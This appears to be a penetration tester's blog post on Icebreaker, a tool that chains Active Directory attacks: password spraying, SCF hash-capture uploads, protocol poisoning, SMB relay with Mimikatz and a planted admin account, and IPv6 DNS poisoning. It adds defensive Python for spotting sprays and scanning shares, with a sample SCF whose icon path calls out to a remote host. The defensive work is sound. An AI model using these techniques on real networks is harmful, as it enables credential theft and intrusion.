Icebreaker: Chip Away at Active Directory Passwords, Automatically

March 16, 2018, Dan McInerney, Senior Security Consultant, Coalfire

To break the ice with Active Directory and shorten the cycles penetration testers spend on cracking passwords, I developed Icebreaker, a tool that automates network attacks against Active Directory and provides plaintext credentials.

Icebreaker performs five network attacks in order:

  1. Reverse bruteforce: Uses several techniques to find valid and potentially valid domain usernames, which are tested against two of the most common Active Directory passwords.
  2. Malicious file upload: Writes a malicious SCF to available network shares that, when opened in explorer by domain users, will send their password hash to the attacker.
  3. Broadcast protocol poisoning: Poisons layer two broadcast protocols to trick domain users’ machines into sending their password hash to the attacker.
  4. SMB relay: Man-in-the-middle attacks SMB connections to gain remote code execution against victim machines. Icebreaker will add a new administrative user to the machine as well as run and parse Mimikatz on it.
  5. IPv6 DNS poison: Poisons IPv6 DNS requests to trick users’ browsers into sending their password hash to the attacker.

Attack 1, reverse bruteforce, and Attack 2, malicious file upload, usually finish quickly. Icebreaker then lingers on Attack 3, broadcast protocol poisoning, for 10 minutes by default. After that time (or the user-specified time) has passed, it moves on to the final two attacks, which run in parallel and indefinitely.

If any hosts that allow null SMB sessions are discovered, Icebreaker will use ridenum to perform RID cycling for valid usernames. If you use the "-d <>" option, theHarvester will scrape any email addresses from the specified website. Any email usernames that are AD-compatible will be added to the reverse bruteforce username list. Icebreaker performs the reverse bruteforce with the Linux tool rpcclient, driven by the asyncio library with 10 async workers.
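Seen from the defender's side, a reverse bruteforce leaves at most two failures per account, so per-account lockout thresholds never trip and detection has to pivot on the source. The following is an added example, not part of Icebreaker or the original post; the record keys (`time`, `src`, `user`) and thresholds are assumptions, loosely modelled on Windows failed-logon (event 4625) data, and the sample events are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

def detect_reverse_bruteforce(events, window=timedelta(minutes=5),
                              min_users=5, max_per_user=2):
    """Flag sources that fail logons for many accounts, a few tries each."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append(ev)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda ev: ev["time"])
        start = 0
        for end in range(len(evs)):
            # Slide the window so it never spans more than `window`.
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            tries = Counter(ev["user"] for ev in evs[start:end + 1])
            # Lockout never fires at <= max_per_user failures, so count the
            # accounts touched lightly rather than the total failures.
            sprayed = {u for u, n in tries.items() if n <= max_per_user}
            if len(sprayed) >= min_users and len(sprayed) > len(alerts.get(src, ())):
                alerts[src] = sprayed
    return {src: sorted(users) for src, users in alerts.items()}

def constructed_events():
    """Constructed sample data, not captured from a real network."""
    t0 = datetime(2018, 3, 16, 9, 0, 0)
    users = ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi"]
    events = []
    # One source walks the whole user list twice (two passwords), 2 s apart.
    for rnd in range(2):
        for i, user in enumerate(users):
            events.append({"time": t0 + timedelta(seconds=60 * rnd + 2 * i),
                           "src": "192.0.2.50", "user": user})
    # A user who forgot a password: many failures, but only one account.
    for i in range(6):
        events.append({"time": t0 + timedelta(seconds=10 * i),
                       "src": "192.0.2.7", "user": "judy"})
    return events

if __name__ == "__main__":
    for src, users in detect_reverse_bruteforce(constructed_events()).items():
        print(f"{src}: {len(users)} accounts with <=2 failures each: {users}")
```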

The SCF upload attack abuses Shell Command Files (SCFs) against anonymously writeable network shares. SCFs are files that can perform basic actions like showing the desktop or opening a File Explorer window. They have the curious property of allowing you to set their file icon to a network path. If you set this network path to your own machine, users who open the file share in File Explorer will automatically send their NetNTLMv2 password hash to you. Icebreaker uses the Nmap script smb-enum-shares to find anonymously writeable shares, then automatically generates and uploads the payloaded SCF.
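Because the whole trick rests on an `IconFile` entry that points at a network path, a share can be audited for it directly. The following is an added example, not part of Icebreaker or the original post: it walks a share, reads each `.scf` file, and reports any whose icon resolves to a remote host. The function names, the demo share, and the sample file contents (using a documentation-range address) are constructed for illustration.

```python
import os
import re
import tempfile

# An icon path that begins with \\host or //host is fetched over the network.
UNC = re.compile(r'^\s*(?:\\\\|//)([^\\/\s]+)')

def remote_icon_host(scf_text):
    """Return the host an SCF's IconFile points at, or None if local/absent."""
    for line in scf_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "iconfile":
            match = UNC.match(value)
            if match:
                return match.group(1)
    return None

def scan_share(root):
    """Return sorted (relative path, remote host) for every suspicious SCF."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read(4096)          # SCFs are tiny; cap the read
            utf16 = raw[:2] in (b"\xff\xfe", b"\xfe\xff")
            text = raw.decode("utf-16" if utf16 else "utf-8", "replace")
            host = remote_icon_host(text)
            if host:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, host))
    return sorted(findings)

def make_demo_share():
    """Constructed sample share: one stock SCF, one with a UNC icon path."""
    root = tempfile.mkdtemp(prefix="share-")
    os.mkdir(os.path.join(root, "public"))
    samples = {
        "Show Desktop.scf": "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n"
                            "[Taskbar]\nCommand=ToggleDesktop\n",
        os.path.join("public", "docs.scf"):
            "[Shell]\nCommand=2\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", newline="\r\n") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    print(scan_share(make_demo_share()))
```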

Attack 3 uses Responder to poison the LLMNR, NBT-NS, and mDNS multicast/broadcast protocols. When users navigate to a nonexistent network path, Responder will tell them your attacker machine is the correct path. The user's NetNTLMv2 password hash is now yours. Responder will capture hashes sent via the SCF attack, but the next attack is generally more useful for capturing SCF hashes because it has the potential of using the hash for command execution.

SMB relay is an old network attack where attackers place themselves in between the SMB client and the SMB server. This allows attackers to capture and relay NetNTLMv2 hashes to hosts that have SMBv1 enabled and SMB signing disabled. ntlmrelayx from the Impacket library is used to relay, while Responder is used to man-in-the-middle SMB connections. Should the SMB client user have administrative rights to any host on the network that has SMB signing disabled, ntlmrelayx will perform command execution on that host.

Once ntlmrelayx relays a captured hash, it will run a base64-encoded PowerShell command that first adds an administrative user (icebreaker:P@ssword123456), then runs an obfuscated and AMSI-bypassing version of Mimikatz. This Mimikatz output is parsed for plaintext passwords or NTLM hashes and delivered to the user in the standard output as well as in the found-passwords.txt file. NTLM hashes, unlike NetNTLMv2 hashes, can be used just like a plaintext password for authentication to other AD hosts. One caveat to note is that ever since Microsoft’s KB2871997 patch was released, only the built-in RID 500 local administrator account can be used in pass-the-hash attacks.

The final attack uses the tool mitm6 to perform a man-in-the-middle IPv6 DNS attack against the whole network. This forces hosts on the network to use the attacker's machine as their DNS server. Once set as their DNS server, the attacker serves malicious WPAD proxy setting files to the victims and gathers their NetNTLMv2 hashes. These hashes are relayed using ntlmrelayx for further remote code execution possibilities. One thing to note is that this attack is prone to causing issues on the network. It often causes certificate errors in the browser on client machines. It will also likely slow the network down. The beauty of this attack, however, is that Windows AD environments are vulnerable by default.

If Icebreaker is run with the --auto [tmux/xterm] flag, then upon reaching attack 4 Icebreaker will run Empire and DeathStar in either a tmux session or xterm windows. With this option, instead of running Mimikatz on the remote host that we relayed the hash to, Icebreaker will add an administrative user, then run Empire's PowerShell launcher code to get an agent on the remote machine. DeathStar will use this agent to automate the process of achieving domain admin. Empire and DeathStar will not close when you exit Icebreaker.

Password cracking is done with JohnTheRipper and a custom wordlist. The list originates from merged.txt, which combines every password from the SecLists GitHub account. The wordlist was pruned to exclude passwords that are all lowercase, all uppercase, all symbols, fewer than 7 characters, or more than 32 characters. These rules conform to the default Active Directory password requirements and brought the list from 20 million to just over 1 million, making password cracking extremely fast.
